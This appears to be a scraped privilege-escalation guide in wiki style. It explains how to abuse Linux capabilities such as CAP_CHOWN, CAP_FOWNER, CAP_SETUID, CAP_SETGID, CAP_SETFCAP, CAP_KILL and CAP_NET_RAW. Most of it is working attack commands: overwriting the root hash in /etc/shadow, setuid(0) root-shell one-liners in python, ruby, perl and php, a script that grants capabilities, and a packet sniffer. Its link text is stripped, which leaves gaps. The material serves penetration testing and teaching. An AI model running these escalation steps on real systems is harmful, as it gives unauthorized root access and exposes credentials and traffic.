$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

And edit the /etc/shadow file to change the root password

#Replace the hash
$ vim /etc/shadow
$ head -n1 /etc/shadow
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:17673:0:99999:7:::

We can now easily su as root

su - root

In the following example the ruby binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/ruby = cap_chown+ep

We can abuse it to modify the file owner of the /etc/shadow file or the /root directory. First we can check what is our current user id

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Replace the attribute numbers with the current user id.

#Get /etc/shadow
$ ruby -e 'require "fileutils"; FileUtils.chown(33, 33, "/etc/shadow")'

#Get /root directory
$ ruby -e 'require "fileutils"; FileUtils.chown(33, 33, "/root")'

We can now generate a new hash

#Using mkpasswd
$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

And edit the /etc/shadow file to change the root password

#Replace the hash
$ vim /etc/shadow
$ head -n1 /etc/shadow
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:17673:0:99999:7:::

We can now easily su as root

su - root

CAP_FOWNER

This means that it's possible to change the permission of any file.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_fowner+ep

We can abuse it to modify the file permissions of the /etc/shadow. First generate a new hash

#Using mkpasswd
$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

Give us permissions over the /etc/shadow file

$ python -c 'import os;os.chmod("/etc/shadow",0666)

And edit the /etc/shadow file to change the root password

#Replace the hash
$ vim /etc/shadow
$ head -n1 /etc/shadow
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:17673:0:99999:7:::

We can now easily su as root

su - root

In the following example the ruby binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/ruby = cap_fowner+ep

We can abuse it to modify the file permissions of the /etc/shadow. First generate a new hash

#Using mkpasswd
$ mkpasswd  -m sha-512 -S saltsalt -s
Mot de passe : password1
$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/

#Or with openssl
$ openssl passwd -6 password1
$6$5h9QsTjUEHVIFVwK$3MkSX5prCEkZax7z5ixV1hdmAghcAGTjX2gAyMFjcAYxYQ00H7xQvskRRi/y.0ouz0sRpqGUWzORK0MdAGv7b0

Give us permissions over the /etc/shadow file

$ ruby -e 'require "fileutils"; FileUtils.chmod(0666, "/etc/shadow")'

And edit the /etc/shadow file to change the root password

#Replace the hash
$ vim /etc/shadow
$ head -n1 /etc/shadow
root:$6$saltsalt$rGHbrrsOT1WLTt4dcfZKq1FiG//1B7ZAMkD.MeAC8/d9MOtB5EzYEffFnBarQhF6MiLywY/KggaYjrNNrzAnj/:17673:0:99999:7:::

We can now easily su as root

su - root

CAP_SETUID

This means that it's possible to set the effective user id of the created process.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_setuid+ep

We can abuse it to spawn an elevated shell

$ python -c 'import os; os.setuid(0); os.system("/bin/bash")'

In the following example the ruby binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/ruby = cap_setuid+ep

We can abuse it to spawn an elevated shell

$ ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'

In the following example the perl binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/perl = cap_setuid+ep

We can abuse it to spawn an elevated shell

$ perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

In the following example the php binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/php8.2 = cap_setuid+ep

We can abuse it to spawn an elevated shell

$ php -r "posix_setuid(0); system('/bin/bash');"

CAP_SETGID

This means that it's possible to set the effective group id of the created process.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_setgid+ep

In this case you should look for interesting files that a group can read/write because you can impersonate any group:

#Find every file writable by a group
$ find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null

Find the group id of the targeted group

$ cat /etc/group
[...]
shadow:x:42:
[...]

We can spawn a shell with the targeted GID

$ python -c 'import os; os.setgid(42); os.system("/bin/bash")'

In the following example the ruby binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/ruby = cap_setgid+ep

In this case you should look for interesting files that a group can read/write because you can impersonate any group:

#Find every file writable by a group
$ find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null

Find the group id of the targeted group

$ cat /etc/group
[...]
shadow:x:42:
[...]

We can spawn a shell with the targeted GID

$ ruby -e 'Process::Sys.setgid(42); exec "/bin/sh"'

In the following example the perl binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/perl = cap_setgid+ep

In this case you should look for interesting files that a group can read/write because you can impersonate any group:

#Find every file writable by a group
$ find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null

Find the group id of the targeted group

$ cat /etc/group
[...]
shadow:x:42:
[...]

We can spawn a shell with the targeted GID

$ perl -e 'use POSIX (setgid); POSIX::setgid(42); exec "/bin/bash";'

In the following example the php binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/php8.2 = cap_setgid+ep

In this case you should look for interesting files that a group can read/write because you can impersonate any group:

#Find every file writable by a group
$ find / -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file writable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=w -exec ls -lLd {} \; 2>/dev/null
#Find every file readable by a group in /etc with a maxpath of 1
$ find /etc -maxdepth 1 -perm /g=r -exec ls -lLd {} \; 2>/dev/null

Find the group id of the targeted group

$ cat /etc/group
[...]
shadow:x:42:
[...]

We can spawn a shell with the targeted GID

$ php -r "posix_setgid(42); system('/bin/bash');"

CAP_SETFCAP

This means that it's possible to set capabilities on files and processes

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_setfcap+ep

We can abuse it to add the cap_setuid capability to the binary of our choice. To exploit, we can use the following script

setcapability.py
import ctypes, sys

#Load needed library
#You can find which library you need to load checking the libraries of local setcap binary
# ldd /sbin/setcap
libcap = ctypes.cdll.LoadLibrary("libcap.so.2")

libcap.cap_from_text.argtypes = [ctypes.c_char_p]
libcap.cap_from_text.restype = ctypes.c_void_p
libcap.cap_set_file.argtypes = [ctypes.c_char_p,ctypes.c_void_p]

#Give setuid cap to the binary
cap = 'cap_setuid+ep'
path = sys.argv[1]
print(path)
cap_t = libcap.cap_from_text(cap)
status = libcap.cap_set_file(path,cap_t)

if(status == 0):
    print (cap + " was successfully added to " + path)

Execute it on the file of your choice

$ python3.11 setcapability.py '/usr/bin/ruby' 

Note that if you set a new capability to the binary with CAP_SETFCAP, you will lose this cap.

CAP_SYS_RAWIO

This can be useful for privilege escalation and Docker breakout.

CAP_KILL

This means that it's possible to kill any process.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_kill+ep

If there is a node program running as root (or as a different user)you could probably send it the signal SIGUSR1 and make it open the node debugger to where you can connect.

$ cat exploit.py
#Use this python code to kill arbitrary processes
import os
import signal
pgid = os.getpgid(341) #this is the node.js pid
os.killpg(pgid, signal.SIGUSR1) 

# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
$ python exploit.py

CAP_NET_BIND_SERVICE

This means that it's possible to listen in any port (even in privileged ones). You cannot escalate privileges directly with this capability.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/bin/python3.11 = cap_net_bind_service+ep

Then, we are able to listen on any port

import socket
s=socket.socket()
s.bind(('0.0.0.0', 80))
s.listen(1)
conn, addr = s.accept()
while True:
        output = connection.recv(1024).strip();
        print(output)

And connect from it to any othe port

import socket
s=socket.socket()
s.bind(('0.0.0.0',500))
s.connect(('10.10.10.10',500))

CAP_NET_RAW

This means that it's possible to sniff traffic. You cannot escalate privileges directly with this capability.

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/sbin/python2.7 = cap_net_raw+ep

We are able to run the following code and sniff traffic of the "lo" (localhost) interface.

import socket
import struct

flags=["NS","CWR","ECE","URG","ACK","PSH","RST","SYN","FIN"]

def getFlag(flag_value):
    flag=""
    for i in xrange(8,-1,-1):
        if( flag_value & 1 <<i ):
            flag= flag + flags[8-i] + ","
    return flag[:-1]

s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(3))
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2**30)
s.bind(("lo",0x0003))

flag=""
count=0
while True:
    frame=s.recv(4096)
    ip_header=struct.unpack("!BBHHHBBH4s4s",frame[14:34])
    proto=ip_header[6]
    ip_header_size = (ip_header[0] & 0b1111) * 4
    if(proto==6):
        protocol="TCP"
        tcp_header_packed = frame[ 14 + ip_header_size : 34 + ip_header_size]
        tcp_header = struct.unpack("!HHLLHHHH", tcp_header_packed)
        dst_port=tcp_header[0]
        src_port=tcp_header[1]
        flag=" FLAGS: "+getFlag(tcp_header[4])

    elif(proto==17):
        protocol="UDP"
        udp_header_packed_ports = frame[ 14 + ip_header_size : 18 + ip_header_size]
        udp_header_ports=struct.unpack("!HH",udp_header_packed_ports)
        dst_port=udp_header[0]
        src_port=udp_header[1]

    if (proto == 17 or proto == 6):
        print("Packet: " + str(count) + " Protocol: " + protocol + " Destination Port: " + str(dst_port) + " Source Port: " + str(src_port) + flag)
        count=count+1

In the following example the tcpdump binary has this capability.

$ getcap -r / 2>/dev/null
/usr/sbin/tcpdump = cap_net_raw+ep

Then, we can sniff sensitive information by running tcpdump for a while.

tcpdump -i lo -A

CAP_NET_ADMIN + CAP_NET_RAW

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/sbin/python2.7 = cap_net_raw,cap_net_admin+ep

We can run following code to dump iptables filter table rules.

import iptc
import pprint
json=iptc.easy.dump_table('filter',ipv6=False)
pprint.pprint(json)

Or flush iptables filter table

import iptc
iptc.easy.flush_table('filter')

CAP_LINUX_IMMUTABLE

If you find that a file is immutable and python has this capability, you can remove the immutable attribute and make the file modifiable

In the following example the python binary has this capability.

$ getcap -r / 2>/dev/null
/usr/sbin/python2.7 = cap_linux_immutable+ep

If you find that a file is immutable, you can remove the immutable attribute and make the file modifiable:

#Check that the file is imutable
lsattr file.sh 
----i---------e--- backup.sh

We can use the following script to remove the attribute

#Pyhton code to allow modifications to the file
import fcntl
import os
import struct

FS_APPEND_FL = 0x00000020
FS_IOC_SETFLAGS = 0x40086602

fd = os.open('/path/to/file.sh', os.O_RDONLY)
f = struct.pack('i', FS_APPEND_FL)
fcntl.ioctl(fd, FS_IOC_SETFLAGS, f)

f=open("/path/to/file.sh",'a+')
f.write('New content for the file\n')

Note that usually this immutable attribute is set and remove using:

sudo chattr +i file.txt
sudo chattr -i file.txt

CAP_SYS_CHROOT

CAP_SETPCAP

A process with CAP_SETPCAP can only grant or remove capabilities that are in its own permitted capability set. In other words, a process cannot grant a capability to another process if it does not have that capability itself. This restriction prevents a process from elevating the privileges of another process beyond its own level of privilege.

Moreover, in recent kernel versions, the CAP_SETPCAP capability has been further restricted. It no longer allows a process to arbitrarily modify the capability sets of other processes. Instead, it only allows a process to lower the capabilities in its own permitted capability set or the permitted capability set of its descendants. This change was introduced to reduce potential security risks associated with the capability.

References

Last updated 1 month ago

Was this helpful?

If you find that a binary have interesting capabilities, you can check on for known exploits.

is largely a catchall capability, it can easily lead to additional capabilities or full root (typically access to all capabilities). CAP_SYS_ADMIN is required to perform a range of administrative operations, which is difficult to drop from containers if privileged operations are performed within the container.

If you are in a docker container and CAP_SYS_ADMIN is enabled, then you can escape. See for more informations.

allows to use ptrace(2) and recently introduced cross memory attach system calls such as process_vm_readv(2) and process_vm_writev(2).

If this capability is granted and the ptrace(2) system call itself is not blocked by a seccomp filter, this will allow an attacker to bypass other seccomp restrictions, see .

If you are in a docker container andCAP_SYS_PTRACE is enabled, then it means that you can escape the container by injecting a shellcode inside some process running inside the host. To access processes running inside the host the container needs to be run at least with --pid=host. See for more informations.

allows the process to load and unload arbitrary kernel modules (init_module(2), finit_module(2) and delete_module(2) system calls).

allows a process to bypass file read, and directory read and execute permissions. While this was designed to be used for searching or reading files, it also grants the process permission to invoke open_by_handle_at(2).

Any process with the capability CAP_DAC_READ_SEARCH can use open_by_handle_at(2) to gain access to any file, even files outside their mount namespace. The handle passed into open_by_handle_at(2) is intended to be an opaque identifier retrieved using name_to_handle_at(2). However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with exploit.

allows to ignore the permission bits of files. With this capability, you can modify any file like passwd, sudoers or shadow to obtain root access.

allow us to make arbitrary changes to file UIDs and GIDs.

allow us to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file. excluding those operations covered by CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH. Additionally it allow us to set inode flags, ACLs on arbitrary files, ignore the directory sticky bit on file deletion.

allow us to make arbitrary manipulations of process UIDs (setuid(2), setreuid(2), setresuid(2), setfsuid(2));

allow us to make arbitrary manipulations of process GIDs and supplementary GID list.

allow us to set arbitrary capabilities on a file.

Once you have you can go to its section to see how to escalate privileges.

provides a number of sensitive operations including access to /dev/mem, /dev/kmem or /proc/kcore, modify mmap_min_addr, access ioperm(2) and iopl(2) system calls, and various disk commands. The FIBMAP ioctl(2) is also enabled via this capability, which has caused issues in the . As per the man page, this also allows the holder to descriptively perform a range of device-specific operations on other devices.

allow us to bypass permission checks for sending signals (see ). This includes use of the KDSIGACCEPT operation.

allow us to Bind a socket to Internet domain privileged ports (port numbers less than 1024).

allows a process to be able to create RAW and PACKET socket types for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device which may allow for a malicious or compromised container to spoof packets at various network layers. A malicious process or compromised container with this capability may inject into upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.

allows the capability holder to modify the exposed network namespaces' firewall, routing tables, socket permissions, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to enable promiscuous mode for the attached network interfaces and potentially sniff across namespaces.

allow us to set the FS_APPEND_FL and FS_IMMUTABLE_FL inode flags

permits the use of the chroot(2) system call. This may allow escaping of any chroot(2) environment, using known weaknesses and escapes.

You may want to have a look on , a chroot breaking tool.

is a Linux capability that allows a process to modify the capability sets of another process. It grants the ability to add or remove capabilities from the effective, inheritable, and permitted capability sets of other processes. However, there are certain restrictions on how this capability can be used.

GTFOBins
CAP_SYS_ADMIN
this page
CAP_SYS_PTRACE
PoC for bypassing seccomp if ptrace is allowed
this page
CAP_SYS_MODULE
CAP_DAC_READ_SEARCH
shocker
CAP_DAC_OVERRIDE
CAP_CHOWN
CAP_CHOWN
CAP
_SETUID
CAP_SETGID
CAP_SETFCAP
CAP_SYS_RAWIO
past
CAP_KILL
kill(2)
ioctl(2)
CAP_NET_BIND_SERVICE
CAP_NET_RAW
CAP_NET_ADMIN
CAP_LINUX_IMMUTABLE
CAP_SYS_CHROOT
chw00t
CAP_SETCAP
SETUID capability
LogoLinux CapabilitiesHackTricks
LogoUnderstanding Capabilities in LinuxTinker, Tamper, Alter, Fry